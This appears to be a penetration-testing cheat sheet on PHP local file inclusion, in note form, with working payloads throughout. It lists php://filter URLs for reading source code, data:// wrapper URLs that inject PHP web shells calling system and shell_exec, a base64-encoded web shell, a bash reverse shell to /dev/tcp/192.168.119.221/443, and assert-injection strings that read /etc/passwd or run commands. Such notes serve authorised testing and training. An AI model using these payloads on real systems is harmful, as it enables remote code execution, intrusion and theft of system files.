# File Inclusion Vuln

## File inclusion Vuln

* **Checking LFI on Windows server**

  instead of /etc/passwd use **C:/Windows/System32/drivers/etc/hosts**
* **PHP Wrappers**

  PHP provides several protocol wrappers1 that we can use to exploit directory traversal and local file inclusion vulnerabilities. These filters give us additional flexibility when attempting to inject PHP code via LFI vulnerabilities.

  We can use the data2 wrapper to embed inline data as part of the URL with plaintext or base643 encoded data. This wrapper provides us with an alternative payload when we cannot poison a local file with PHP code.

  * **filter** to check source code of executable files
    * <http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-> encode/resource=\<file>
      * <http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-> encode/resource=admin.php
        * then decode the output via echo “ “ | base64 -d
  * **data:**
    * \<http\://\<vul-web>/menu.php?file=data:text/plain,\<?php echo shell\_exec("dir") ?>
    * if there any restriction then it can be bypass by encoding
      * echo -n '\<?php echo system($\_GET\["cmd"]);?>' | base64
        * PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==
      * <http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZW> NobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==\&cmd=ls"
    * Reverse shell http\://\<ip>/section.php?page=data:text/plain,\<?php echo shell\_exec('bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.221%2F443%200%3E%261');?>
* LFI through alternate way

  if ../../../etc/passwd don’t work then

  * ' and die(show\_source('/etc/passwd')) or ‘
  * for command use shell
    * ' and die(system("\<command>")) or ‘

  <https://h0j3n.medium.com/vulnhub-assertion-1-0-1-eb78a0cb9216>